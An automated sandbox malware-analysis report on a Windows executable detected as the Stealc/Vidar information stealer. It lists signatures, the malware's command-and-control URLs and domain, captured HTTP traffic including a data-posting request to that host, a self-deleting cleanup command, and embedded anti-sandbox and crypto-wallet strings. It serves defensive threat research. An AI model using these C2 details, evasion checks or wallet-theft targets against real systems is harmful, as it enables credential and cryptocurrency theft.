Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562215
MD5:	0abcf5f274cf19c6f9c75954e9b6a182
SHA1:	e39e1cecaffce08ffd9388ded9e13132e1eb6d51
SHA256:	54267849112931dc771eac100a8e3302f224f5071cc6211723e5acf89bf69156
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

PE file has a writeable .text section

Performs DNS queries to domains with low reputation

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0ABCF5F274CF19C6F9C75954E9B6A182)

cmd.exe (PID: 2824 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCAKFCGCGIEG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6120 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "fc02efe1cfb2a62f36f33fff0274fb41"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author
file.exe	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
file.exe	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
file.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6544	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6544	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6544	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6544	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6544	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.file.exe.d50000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.0.file.exe.d50000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.0.file.exe.d50000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.d50000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.d50000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.d50000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.d8ecc0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T10:59:27.922634+0100	2044247	1	Malware Command and Control Activity Detected	49.13.32.95	443	192.168.2.5	49736	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T10:59:30.343771+0100	2051831	1	Malware Command and Control Activity Detected	49.13.32.95	443	192.168.2.5	49742	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T10:59:30.343541+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49742	49.13.32.95	443	TCP

Code function: 0_2_00D5688F InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00D5688F

Source: global traffic	HTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlite3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: b2een.xyz

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 09:59:33 GMTContent-Type: text/htmlContent-Length: 146Connection: close

Source: file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz
Source: file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/
Source: file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/bi
Source: file.exe, 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2411895737.00000000035FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/sqlite3.dll
Source: file.exe, 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://b2een.xyzHJJJJKEG
Source: file.exe, 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://b2een.xyztosh;
Source: file.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199802540894
Source: file.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199802540894r08etMozilla/5.0
Source: file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: file.exe, 00000000.00000002.2582970427.000000000351E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/O
Source: file.exe	String found in binary or memory: https://t.me/fu4chmo
Source: file.exe, 00000000.00000003.2252456986.0000000003595000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fu4chmo338
Source: file.exe, 00000000.00000002.2582970427.0000000003564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fu4chmof
Source: file.exe	String found in binary or memory: https://t.me/fu4chmor08etMozilla/5.0
Source: file.exe, 00000000.00000003.2252456986.0000000003595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2582970427.0000000003590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.5:49717 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D58DEA _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcpyA,_memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00D58DEA

System Summary

PE file has a writeable .text section

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D5144B GetCurrentProcess,NtQueryInformationProcess,

0_2_00D5144B

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7F1B3	0_2_00D7F1B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7EA43	0_2_00D7EA43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6ACEC	0_2_00D6ACEC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6DC54	0_2_00D6DC54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7EDE1	0_2_00D7EDE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7F59B	0_2_00D7F59B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7E5AE	0_2_00D7E5AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6CEF4	0_2_00D6CEF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D57FAB	0_2_00D57FAB

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00D62265 appears 73 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00D62143 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00D5470C appears 287 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/1@2/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D63101 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00D63101

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D633B3 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,

0_2_00D633B3

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9JVOTHPW.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\file.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCAKFCGCGIEG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCAKFCGCGIEG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D6A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00D6A132

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D809C2 push ecx; ret	0_2_00D809D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D745B9 push esi; ret	0_2_00D745BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6F635 push ecx; ret	0_2_00D6F648

Source: C:\Users\user\Desktop\file.exe

0_2_00D6A132

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe	Binary or memory string: API_LOG.DLL
Source: file.exe	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL10:31:5110:31:5110:31:5110:31:5110:31:5110:31:51DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Users\user\Desktop\file.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

0_2_00D517FD

Source: C:\Windows\SysWOW64\timeout.exe TID: 6972

Thread sleep count: 84 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D62A37 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00D62B4Ah

0_2_00D62A37

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D67178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00D67178
